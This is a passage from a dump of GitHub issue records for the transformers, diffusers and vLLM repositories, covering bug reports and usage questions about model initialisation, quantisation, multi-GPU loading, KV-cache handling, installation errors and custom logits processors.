"updated_at": "2025-11-26T11:46:08Z", "comments": 1, "user": "pradsgit" }, { "repo": "huggingface/transformers", "number": 42418, "title": "Custom nn.Parameter initialization in PreTrainedModel subclasses is overwritten by post_init()/from_pretrained() causing NaNs/Zeros", "body": "### System Info\n\n- `transformers` version: 4.57.1\n- Platform: Linux-4.18.0-147.mt20200626.413.el8_1.x86_64-x86_64-with-glibc2.35\n- Python version: 3.10.14\n- Huggingface_hub version: 0.35.3\n- Safetensors version: 0.6.2\n- Accelerate version: 1.11.0\n- Accelerate config: not found\n- DeepSpeed version: 0.18.2\n- PyTorch version (accelerator?): 2.7.1+cu126 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n- Using GPU in script?: No\n- GPU type: NVIDIA A100-SXM4-80GB\n\n\n### Who can help?\n\n@Cyrilvallez @zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nimport numpy as np\nimport os\nimport random\nimport torch\nimport torch.nn as nn\n\nfrom transformers import Qwen3VLForConditionalGeneration\n\n\ndef seed_everything(TORCH_SEED):\n random.seed(TORCH_SEED)\n os.environ[\"PYTHONHASHSEED\"] = str(TORCH_SEED)\n np.random.seed(TORCH_SEED)\n torch.manual_seed(TORCH_SEED)\n torch.cuda.manual_seed(TORCH_SEED)\n torch.cuda.manual_seed_all(TORCH_SEED)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\nseed_everything(66)\n\n\nclass TestModel1(Qwen3VLForConditionalGeneration):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.action_head = nn.Linear(1024, 7)\n self.positional_embedding = nn.Parameter(torch.randn(16, 1152))\n self.post_init()\n\n\nclass TestModel2(nn.Module):\n def __init__(self, *args, model_path, **kwargs):\n super().__init__(*args, **kwargs)\n self.model = Qwen3VLForConditionalGeneration.from_pretrained(model_path)\n self.action_head = nn.Linear(1024, 7)\n self.positional_embedding = nn.Parameter(torch.randn(16, 1152))\n\n\ntest_model1 = TestModel1.from_pretrained(\"Qwen/Qwen3-VL-4B-Instruct\")\ntest_model2 = TestModel2(model_path=\"Qwen/Qwen3-VL-4B-Instruct\")\nprint(test_model1.positional_embedding)\nprint(test_model1.positional_embedding.mean(), test_model1.positional_embedding.std())\nprint(test_model2.positional_embedding)\nprint(test_model2.positional_embedding.mean(), test_model2.positional_embedding.std())\n````\n\n### Expected behavior\n\nWhen subclassing a model (inheriting from PreTrainedModel, e.g., Qwen3VLForConditionalGeneration, LlamaForCausalLM) to add custom learnable parameters, user-defined initialization in __init__ is often silently overwritten.\n\nThis occurs because from_pretrained (or the end of __init__) triggers self.post_init(), which recursively calls _init_weights. This mechanism re-initializes all parameters, ignoring the explicit initialization code provided by the user in __init__.\n\nIn the specific case of Qwen3-VL (and potentially others), this re-initialization results in NaNs or Zeros, rendering the model unusable without manual intervention.\n\nSteps to reproduce The following script demonstrates the issue. Note: I used torch.randn for the custom parameter initialization. While I understand that torch.randn samples from a standard normal distribution and does not guarantee an exact sample mean of 0 and std of 1, it should result in valid float values. The observed NaNs/Zeros confirm that this initialization is being discarded and replaced by a faulty internal initialization logic.", "url": "https://github.com/huggingface/transformers/issues/42418", "state": "open", "labels": [ "Usage", "Feature request", "bug" ], "created_at": "2025-11-26T10:29:57Z", "updated_at": "2025-12-01T15:10:32Z", "comments": 10, "user": "Noietch" }, { "repo": "huggingface/diffusers", "number": 12720, "title": "how to quantization wan 2.2 vace after loading lora?", "body": "```python3\ndiffusers.WanVACEPipeline.from_pretrained('linoyts/Wan2.2-VACE-Fun-14B-diffusers', vae=diffusers.AutoencoderKLWan.from_pretrained('linoyts/Wan2.2-VACE-Fun-14B-diffusers', subfolder='vae', torch_dtype=torch.float32), torch_dtype=torch.bfloat16, quantization_config=diffusers.PipelineQuantizationConfig(quant_backend='bitsandbytes_8bit', quant_kwargs={'load_in_8bit':True}, components_to_quantize=['transformer', 'transformer_2'])).save_pretrained('wan')\n```\nnormally I can save the quantization model in this way\nBut now I want to merge lora and the quantization and then save the model with lora. How?\n\n```python3\nwan = diffusers.WanVACEPipeline.from_pretrained('linoyts/Wan2.2-VACE-Fun-14B-diffusers', vae=diffusers.AutoencoderKLWan.from_pretrained('linoyts/Wan2.2-VACE-Fun-14B-diffusers', subfolder='vae', torch_dtype=torch.float32), torch_dtype=torch.bfloat16)\nwan.load_lora_weights('lightx2v/Wan2.2-Lightning', weight_name='Wan2.2-I2V-A14B-4steps-lora-rank64-Seko-V1/high_noise_model.safetensors', adapter_name='lightning')\nwan.load_lora_weights('lightx2v/Wan2.2-Lightning', weight_name='Wan2.2-I2V-A14B-4steps-lora-rank64-Seko-V1/low_noise_model.safetensors', adapter_name='lightning_2', load_into_transformer_2=True)\nwan.set_adapters(['lightning', 'lightning_2'], adapter_weights=[1] * 2)\n\nhow to quantization and save_pretrained?\n```\n@yiyixuxu @DN6", "url": "https://github.com/huggingface/diffusers/issues/12720", "state": "open", "labels": [], "created_at": "2025-11-26T10:11:38Z", "updated_at": "2025-12-11T17:29:30Z", "user": "chaowenguo" }, { "repo": "vllm-project/vllm", "number": 29489, "title": "[Usage]: Removing last generated token from output and kv cache", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.13.5 | packaged by conda-forge | (main, Jun 16 2025, 08:27:50) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B200\nGPU 1: NVIDIA B200\nGPU 2: NVIDIA B200\nGPU 3: NVIDIA B200\nGPU 4: NVIDIA B200\nGPU 5: NVIDIA B200\nGPU 6: NVIDIA B200\nGPU 7: NVIDIA B200\n\nNvidia driver version : 570.195.03\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 224\nOn-line CPU(s) list: 0-223\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8570\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 56\nSocket(s): 2\nStepping: 2\nCPU(s) scaling MHz: 33%\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities ibpb_exit_to_user\nVirtualization: VT-x\nL1d cache: 5.3 MiB (112 instances)\nL1i cache: 3.5 MiB (112 instances)\nL2 cache: 224 MiB (112 instances)\nL3 cache: 600 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-55,112-167\nNUMA node1 CPU(s): 56-111,168-223\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI", "url": "https://github.com/vllm-project/vllm/issues/29489", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-26T09:35:37Z", "updated_at": "2025-11-26T09:36:37Z", "comments": 0, "user": "josefdra" }, { "repo": "huggingface/diffusers", "number": 12719, "title": "how to use quantization and device_map=balance to run qwen-image on kaggle T4 * 2", "body": "```python3\n!python3 -m pip install -U diffusers peft bitsandbytes protobuf\nimport diffusers, torch, math\nqwen = diffusers.QwenImagePipeline.from_pretrained('Qwen/Qwen-Image', quantization_config=diffusers.PipelineQuantizationConfig(quant_backend='bitsandbytes_4bit', quant_kwargs={'load_in_4bit':True, 'bnb_4bit_quant_type':'nf4', 'bnb_4bit_compute_dtype':torch.float16}, components_to_quantize=['transformer', 'text_encoder']), torch_dtype=torch.float16, device_map='balanced')\nprint(qwen.hf_device_map)\nqwen.scheduler = diffusers.FlowMatchEulerDiscreteScheduler.from_config({'base_image_seq_len':256, 'base_shift':math.log(3), 'invert_sigmas':False, 'max_image_seq_len':8192, 'max_shift':math.log(3), 'num_train_timesteps':1000, 'shift':1, 'shift_terminal':None, 'stochastic_sampling':False, 'time_shift_type':'exponential', 'use_beta_sigmas':False, 'use_dynamic_shifting':True, 'use_exponential_sigmas':False, 'use_karras_sigmas':False})\nqwen.load_lora_weights('lightx2v/Qwen-Image-Lightning', weight_name='Qwen-Image-Lightning-4steps-V2.0.safetensors', adapter_name='lightning')\nqwen.set_adapters('lightning', adapter_weights=1)\nqwen(prompt='a beautiful girl', height=1280, width=720, num_inference_steps=4, true_cfg_scale=1).images[0].save('a.png')\n```\n\nWARNING:accelerate.big_modeling:Some parameters are on the meta device because they were offloaded to the cpu.\n{'text_encoder': 'cpu', 'vae': 0} where is the transformer ?\n\nNotImplementedError: Cannot copy out of meta tensor; no data!\n\nI want to ask how to make the above code work in kaggle. why 16G * 2 vram still not enough to run q4 quantization qwen-image? I want to take full advantage of 2 gpu. Do I need max_memory?\n\nfull error logs:\n/usr/local/lib/python3.11/dist-packages/torch/utils/_contextlib.py in decorate_context(*args, **kwargs)\n 114 def decorate_context(*args, **kwargs):\n 115 with ctx_factory():\n--> 116 return func(*args, **kwargs)\n 117 \n 118 return decorate_context\n\n/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py in __call__(self, prompt, negative_prompt, true_cfg_scale, height, width, num_inference_steps, sigmas, guidance_scale, num_images_per_prompt, generator, latents, prompt_embeds, prompt_embeds_mask, negative_prompt_embeds, negative_prompt_embeds_mask, output_type, return_dict, attention_kwargs, callback_on_step_end, callback_on_step_end_tensor_inputs, max_sequence_length)\n 566 )\n 567 do_true_cfg = true_cfg_scale > 1 and has_neg_prompt\n--> 568 prompt_embeds, prompt_embeds_mask = self.encode_prompt(\n 569 prompt=prompt,\n 570 prompt_embeds=prompt_embeds,\n\n/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py in encode_prompt(self, prompt, device, num_images_per_prompt, prompt_embeds, prompt_embeds_mask, max_sequence_length)\n 252 \n 253 if prompt_embeds is None:\n--> 254 prompt_embeds, prompt_embeds_mask = self._get_qwen_prompt_embeds(prompt, device)\n 255 \n 256 prompt_embeds = prompt_embeds[:, :max_sequence_length]\n\n/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py in _get_qwen_prompt_embeds(self, prompt, device, dtype)\n 203 txt, max_length=self.tokenizer_max_length + drop_idx, padding=True, truncation=True, return_tensors=\"pt\"\n 204 ).to(device)\n--> 205 encoder_hidden_states = self.text_encoder(\n 206 input_ids=txt_tokens.input_ids,\n 207 attention_mask=txt_tokens.attention_mask,\n\n/usr/local/lib/python3.11/dist-packages/torch/nn/modules/module.py in _wrapped_call_impl(self, *args, **kwargs)\n 1737 return self._compiled_call_impl(*args, **kwargs) # type: ignore[misc]\n 1738 else:\n-> 1739 return self._call_impl(*args, **kwargs)\n 1740 \n 1741 # torchrec tests the code consistency with the following code\n\n/usr/local/lib/python3.11/dist-packages/torch/nn/modules/module.py in _call_impl(self, *args, **kwargs)\n 1748 or _global_backward_pre_hooks or _global_backward_hooks\n 1749 or _global_forward_hooks or _global_forward_pre_hooks):\n-> 1750 return forward_call(*args, **kwargs)\n 1751 \n 1752 result = None\n\n/usr/local/lib/python3.11/dist-packages/accelerate/hooks.py in new_forward(module, *args, **kwargs)\n 173 output = module._old_forward(*args, **kwargs)\n 174 else:\n--> 175 output = module._old_forward(*args, **kwargs)\n 176 return module._hf_hook.post_forward(module, output)\n 177 \n\n/usr/local/lib/python3.11/dist-packages/transformers/utils/generic.py in wrapper(self, *args, **kwargs)\n 941 \n 942 try:\n--> 943 output = func(self, *args, **kwargs)\n 944 if is_requested_to_return_tuple or (is_configured_to_return_tuple and is_top_level_module):\n 945 ", "url": "https://github.com/huggingface/diffusers/issues/12719", "state": "open", "labels": [], "created_at": "2025-11-26T08:35:46Z", "updated_at": "2025-11-26T09:15:54Z", "user": "chaowenguo" }, { "repo": "vllm-project/vllm", "number": 29474, "title": "[P/D][Metrics] Consider combined/summed metrics (e.g. ttft and e2e_request_latency) for prefill and decode instances", "body": "### Your current environment\n\n
\n\nEnv info snipped\n\n```\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.1 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-5.15.0-152-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 570.172.08\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 128\nOn-line CPU(s) list: 0-127\nVendor ID: GenuineIntel\nBIOS Vendor ID: Intel(R) Corporation\nModel name: INTEL(R) XEON(R) PLATINUM 8562Y+\nBIOS Model name: INTEL(R) XEON(R) PLATINUM 8562Y+ CPU @ 2.8GHz\nBIOS CPU family: 179\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 32\nSocket(s): 2\nStepping: 2\nCPU(s) scaling MHz: 73%\nCPU max MHz: 4100.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5600.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 3 MiB (64 instances)\nL1i cache: 2 MiB (64 instances)\nL2 cache: 128 MiB (64 instances)\nL3 cache: 120 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-31,64-95\nNUMA node1 CPU(s): 32-63,96-127\nVulnerability Gather data sampling: Not affected\nVulnerability Indirect target s", "url": "https://github.com/vllm-project/vllm/issues/29474", "state": "open", "labels": [ "usage", "kv-connector" ], "created_at": "2025-11-26T02:50:17Z", "updated_at": "2025-11-26T08:31:18Z", "comments": 1, "user": "mgw2168-1" }, { "repo": "vllm-project/vllm", "number": 29472, "title": "[Installation]: how to Install vllm on dell promax gb10", "body": "### Your current environment\n\nI failed to install vllm on dell promax gb10 , mesages as followed\n\nnvcc --version\nnvcc: NVIDIA (R) Cuda compiler driver\nCopyright (c) 2005-2025 NVIDIA Corporation\nBuilt on Wed_Aug_20_01:57:39_PM_PDT_2025\nCuda compilation tools, release 13.0, V13.0.88\nBuild cuda_13.0.r13.0/compiler.36424714_0\n\n\npip install vllm\nSuccessfully installed torch-2.9.0 torchaudio-2.9.0 torchvision-0.24.0 vllm-0.11.2\n\n```\n(py312) dell@promaxgb10-0843:~/test/vllm/Qwen$ vllm -V\nTraceback (most recent call last):\n File \"/home/dell/miniconda3/envs/py312/bin/vllm\", line 3, in \n from vllm.entrypoints.cli.main import main\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/entrypoints/cli/__init__.py\", line 3, in \n from vllm.entrypoints.cli.benchmark.latency import BenchmarkLatencySubcommand\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/entrypoints/cli/benchmark/latency.py\", line 5, in \n from vllm.benchmarks.latency import add_cli_args, main\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/benchmarks/latency.py\", line 17, in \n from vllm.engine.arg_utils import EngineArgs\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/engine/arg_utils.py\", line 35, in \n from vllm.attention.backends.registry import AttentionBackendEnum\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/attention/__init__.py\", line 4, in \n from vllm.attention.backends.abstract import (\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/attention/backends/abstract.py\", line 9, in \n from vllm.model_executor.layers.linear import ColumnParallelLinear\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/model_executor/__init__.py\", line 4, in \n from vllm.model_executor.parameter import BasevLLMParameter, PackedvLLMParameter\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/model_executor/parameter.py\", line 11, in \n from vllm.distributed import (\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/distributed/__init__.py\", line 4, in \n from .communication_op import *\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/distributed/communication_op.py\", line 9, in \n from .parallel_state import get_tp_group\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/distributed/parallel_state.py\", line 250, in \n direct_register_custom_op(\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/utils/torch_utils.py\", line 640, in direct_register_custom_op\n from vllm.platforms import current_platform\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/platforms/__init__.py\", line 257, in __getattr__\n _current_platform = resolve_obj_by_qualname(platform_cls_qualname)()\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/utils/import_utils.py\", line 89, in resolve_obj_by_qualname\n module = importlib.import_module(module_name)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/importlib/__init__.py\", line 90, in import_module\n return _bootstrap._gcd_import(name[level:], package, level)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/platforms/cuda.py\", line 16, in \n import vllm._C # noqa\n ^^^^^^^^^^^^^^\nImportError: libtorch_cuda.so: cannot open shared object file: No such file or directory\n```\n\n\n\n\n### How you are installing vllm\n\n```sh\npip install vllm\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29472", "state": "open", "labels": [ "installation" ], "created_at": "2025-11-26T02:41:18Z", "updated_at": "2026-01-01T12:28:29Z", "comments": 2, "user": "goactiongo" }, { "repo": "vllm-project/vllm", "number": 29436, "title": "[Bug]: vLLM Serve with LMCache enabled produces wrong output for GPT-OSS-20B", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nvLLM serve command with LMCache enabled produces wrong output with GPT OSS 20B for subsequent invocations with the same prompt\n\nSteps to reproduce:\nCommand to start the server:\n```\nLMCACHE_CONFIG_FILE=lmcache_cpu.yaml\nvllm serve openai/gpt-oss-20b --port 8000 --kv-transfer-config '{\"kv_connector\":\"LMCacheConnectorV1\", \"kv_role\":\"kv_both\"}'\n```\n\nInvocation:\n```\ncurl 127.0.0.1:8000/v1/chat/completions -H \"Content-Type: application/json\" -d '{\"model\": \"openai/gpt-oss-20b\", \"messages\": [ {\"role\": \"user\", \"content\": \"What is Amazon SageMaker?\"}]}'\n```\n\nFirst invocation:\n```\n{\n\"id\":\"chatcmpl-951ca7178b1e4226b0343cb070033487\",\n\"object\":\"chat.completion\",\n\"created\":1764098087,\n\"model\":\"openai/gpt-oss-20b\",\n\"choices\":[\n{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":\"**Amazon SageMaker** is Amazon Web Services\u2019 fully\u2011managed platform that lets you build, train, tune, and deploy machine\u2011learning models fast\u2014without managing the underlying infrastructure.\\n\\nKey capabilities\\n\\n| Feature | What it does |\\n|--------|--------------|\\n| **SageMaker Studio** | A web\u2011based IDE that bundles notebooks, visual debugging, model monitoring, and collaboration tools. |\\n| **Built\u2011in algorithms & frameworks** | Pre\u2011packaged models (XGBoost, Linear Learner, etc.) and support for your own TensorFlow, PyTorch, MXNet, Scikit\u2011learn, R, etc. |\\n| **Auto\u2011ML & automated model tuning** | SageMaker Autopilot automatically searches model architectures and hyper\u2011parameters. |\\n| **Managed training** | Spot, distributed, and GPU training jobs that scale to the required compute. |\\n| **Model deployment** | One\u2011click production endpoints, batch transform, edge inference (SageMaker Edge), and real\u2011time or asynchronous inference. |\\n| **Inference pipelines** | Compose multiple models or processing steps into a single pipeline. |\\n| **Model monitoring & A/B testing** | Continuous evaluation of drift, predictions, and performance metrics. |\\n| **Security & compliance** | VPC, IAM, KMS encryption, private cataloging, and audit trails. |\\n\\nIn short, SageMaker removes the operational burden of ML\u2014so teams can focus on data science and business value rather than servers, networking, and scaling.\",\"refusal\":null,\"annotations\":null,\"audio\":null,\"function_call\":null,\"tool_calls\":[],\"reasoning\":\"User asks \\\"What is Amazon SageMaker?\\\" Short answer. Provide description: fully managed ML service, environment to build, train, deploy models, etc. Should be succinct.\",\"reasoning_content\":\"User asks \\\"What is Amazon SageMaker?\\\" Short answer. Provide description: fully managed ML service, environment to build, train, deploy models, etc. Should be succinct.\"},\"logprobs\":null,\"finish_reason\":\"stop\",\"stop_reason\":null,\"token_ids\":null}],\"service_tier\":null,\"system_fingerprint\":null,\"usage\":{\"prompt_tokens\":75,\"total_tokens\":426,\"completion_tokens\":351,\"prompt_tokens_details\":null},\"prompt_logprobs\":null,\"prompt_token_ids\":null,\"kv_transfer_params\":null}\n```\n\nSecond invocation:\n```\n{\n \"id\": \"chatcmpl-4ebc19fc5c2a41a7bebc01ea8d1c98b1\",\n \"object\": \"chat.completion\",\n \"created\": 1764098160,\n \"model\": \"openai/gpt-oss-20b\",\n \"choices\": [\n {\n \"index\": 0,\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"Sure! Here\u2019s a basic guide to get you started with writing a cool, informative yet accessible article on **\\\"The Fascinating World of Quantum Computing\\\"** for a general audience. Feel free to adapt the structure, tone, or content to match your style and publication\u2019s guidelines.\\n\\n---\\n\\n## 1. Hook & Context (\u2248150\u2013200 words)\\n\\n- **Start with a vivid anecdote, surprising fact, or a relatable analogy** that introduces the \u201cwow\u201d moment in quantum computing.\\n - *Example:* \u201cImagine a coin that, instead of being heads or tails, can be both at the same time\u2026 until you look at it.\u201d \\n- **Briefly state why this topic matters** to everyday life: faster drug discovery, better encryption, breakthrough materials, etc.\\n\\n> **Tell readers what they\u2019ll learn**: a quick glimpse of quantum fundamentals, why it\u2019s different from classic bits, and how it could reshape technologies.\\n\\n---\\n\\n## 2. What\u2019s a Quantum Computer? (\u2248300 words)\\n\\n| Section | Content | Quick Tips |\\n|---------|---------|------------|\\n| **2.1 \u201cBits\u201d vs. \u201cQubits\u201d** | \u2022 Classical bits (\u201c0\u201d or \u201c1\u201d).
\u2022 Qubits: superposition (both 0 & 1) & entanglement. | Use visual metaphors: a spinning top (superposition) and two dancers always in sync (entanglement). |\\n| **2.2 Basic Operations** | \u2022 Quantum gates (Pauli X, H, CNOT).
\u2022 The role of interference. | A tiny \u201creversible\u201d logic of the quantum \u201cif\u2011then\u201d that flips outcomes. |\\n| **2.3 Measuring As a Collapses** | \u2022 Outcome collapse on measurement.
\u2022 Probabilities & expectation values. | Compare to a gamble: you only learn the re", "url": "https://github.com/vllm-project/vllm/issues/29436", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-25T19:27:24Z", "updated_at": "2025-11-25T19:27:24Z", "comments": 0, "user": "ksuma2109" }, { "repo": "vllm-project/vllm", "number": 29409, "title": "[Usage]: Custom Logits Processors V1 how to get tokenizer into processor", "body": "### Problem with tokenizer\n\nFor the second day now, I've been unable to figure out how to get a tokenizer inside a custom processor. I used the processor from the documentation as an example. I examined each object through debug, but couldn't find where to extract the tokenizer. In v0, this was done simply at the request level, by passing an argument to the object. \nHow to pass a tokenizer to the processor?\n```python import torch\nfrom vllm.config import VllmConfig\nfrom vllm.sampling_params import SamplingParams\nfrom vllm.v1.sample.logits_processor import (BatchUpdate,\n LogitsProcessor,\n MoveDirectionality)\n\n\n\nclass DummyLogitsProcessor(LogitsProcessor):\n \"\"\"Fake logit processor to support unit testing and examples\"\"\"\n\n @classmethod\n def 